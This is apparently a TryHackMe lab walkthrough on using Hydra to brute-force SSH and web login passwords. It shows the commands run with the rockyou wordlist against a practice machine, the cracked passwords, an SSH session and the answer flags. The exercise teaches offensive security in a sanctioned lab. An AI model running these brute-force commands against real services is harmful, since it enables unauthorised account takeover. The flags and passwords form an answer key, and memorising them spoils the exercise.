Hydra Introduction
Hydra is a brute force online password cracking program, a quick system login password “hacking” tool.
Hydra can run through a list and “brute force” some authentication services. Imagine trying to manually guess someone’s password on a particular service (SSH, Web Application Form, FTP or SNMP) - we can use Hydra to run through a password list and speed this process up for us, determining the correct password.
According to its official repository, Hydra supports, i.e., has the ability to brute force the following protocols: “Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MEMCACHED, MONGODB, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, Radmin, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, TeamSpeak (TS2), Telnet, VMware-Auth, VNC and XMPP.”
For more information on the options of each protocol in Hydra, you can check the Kali Hydra tool page.
This shows the importance of using a strong password; if your password is common, doesn’t contain special characters and is not above eight characters, it will be prone to be guessed. A one-hundred-million-password list contains common passwords, so when an out-of-the-box application uses an easy password to log in, change it from the default! CCTV cameras and web frameworks often use admin:password as the default login credentials, which is obviously not strong enough.
Installing Hydra
Hydra is already installed on the AttackBox. You can access it by clicking on the Start AttackBox button.
If you prefer to use the in-browser Kali machine, Hydra also comes pre-installed, as is the case with all Kali distributions. You can access it by selecting Use Kali Linux and clicking on Start Kali Linux button.
However, you can check its official repositories if you prefer to use another Linux distribution. For instance, you can install Hydra on an Ubuntu or Fedora system by executing apt install hydra or dnf install hydra. Furthermore, you can download it from its official THC-Hydra repository.
Databases 101
Start the AttackBox by pressing the Start AttackBox button at the top of this page. The AttackBox machine will start in Split-Screen view. If it is not visible, use the blue Show Split View button at the top of the page.
Press the green Start Machine button below to deploy the machine attached to this task, then navigate to http://MACHINE_IP _on the AttackBox (this machine can take up to 3 minutes to boot)_
Hydra Commands
The options we pass into Hydra depend on which service (protocol) we’re attacking. For example, if we wanted to brute force FTP with the username being user and a password list being passlist.txt, we’d use the following command:
hydra -l user -P passlist.txt ftp://MACHINE_IP
For this deployed machine, here are the commands to use Hydra on SSH and a web form (POST method).
SSH
hydra -l <username> -P <full path to pass> MACHINE_IP -t 4 ssh
| Option | Description |
|---|---|
-l | specifies the (SSH) username for login |
-P | indicates a list of passwords |
-t | sets the number of threads to spawn |
For example, hydra -l root -P passwords.txt MACHINE_IP -t 4 ssh will run with the following arguments:
- Hydra will use
rootas the username forssh - It will try the passwords in the
passwords.txtfile - There will be four threads running in parallel as indicated by
-t 4
Post Web Form
We can use Hydra to brute force web forms too. You must know which type of request it is making; GET or POST methods are commonly used. You can use your browser’s network tab (in developer tools) to see the request types or view the source code.
sudo hydra <username> <wordlist> MACHINE_IP http-post-form "<path>:<login_credentials>:<invalid_response>"
| Option | Description |
|---|---|
-l | the username for (web form) login |
-P | the password list to use |
http-post-form | the type of the form is POST |
<path> | the login page URL, for example, login.php |
<login_credentials> | the username and password used to log in, for example, username=^USER^&password=^PASS^ |
<invalid_response> | part of the response when the login fails |
-V | verbose output for every attempt |
Below is a more concrete example Hydra command to brute force a POST login form:
hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
- The login page is only
/, i.e., the main IP address. - The
usernameis the form field where the username is entered - The specified username(s) will replace
^USER^ - The
passwordis the form field where the password is entered - The provided passwords will be replacing
^PASS^ - Finally,
F=incorrectis a string that appears in the server reply when the login fails
You should now have enough information to put this to practice and brute force your credentials to the deployed machine!
Answer the questions
Use Hydra to bruteforce molly's web password. What is flag 1?
POST /login HTTP/1.1
Host: 10.10.10.37
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Origin: http://10.10.10.37
Connection: keep-alive
Referer: http://10.10.10.37/login
Cookie: connect.sid=s%3AFVEi0bjSoX_fJjN2WhwZafXlR-BwbZ8C.1eQqAOZiOkGgygqahjWLyMm7tsQ4%2B8e0lxOi%2FzPlPyY
Upgrade-Insecure-Requests: 1
Priority: u=0, i
username=test&password=test
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.10.37 http-post-form "/login:username=^USER^&password=^PASS^:F=Your username or password is incorrect." -V
[80][http-post-form] host: 10.10.10.37 login: molly password: sunshine
Login with the username molly and password sunshine
Answer: THM{2673a7dd116de68e85c48ec0b1f2612e}
Use Hydra to bruteforce molly's SSH password. What is flag 2?
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.10.37 ssh -V
[22][ssh] host: 10.10.10.37 login: molly password: butterfly
root@ip-10-10-248-245:~# ssh molly@10.10.10.37
The authenticity of host '10.10.10.37 (10.10.10.37)' can't be established.
ECDSA key fingerprint is SHA256:Scw1XWMoNZnVgd90MF4TaLxeZqu/Ejai2O0jcxL+Ihs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.37' (ECDSA) to the list of known hosts.
molly@10.10.10.37's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-1083-aws x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Thu 06 Nov 2025 07:50:07 PM UTC
System load: 0.0 Processes: 135
Usage of /: 18.6% of 14.47GB Users logged in: 0
Memory usage: 19% IPv4 address for ens5: 10.10.10.37
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
7 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue Dec 17 14:37:49 2019 from 10.8.11.98
molly@ip-10-10-10-37:~$ ls
flag2.txt
molly@ip-10-10-10-37:~$ cat flag2.txt
THM{c8eeb0468febbadea859baeb33b2541b}
Answer: THM{c8eeb0468febbadea859baeb33b2541b}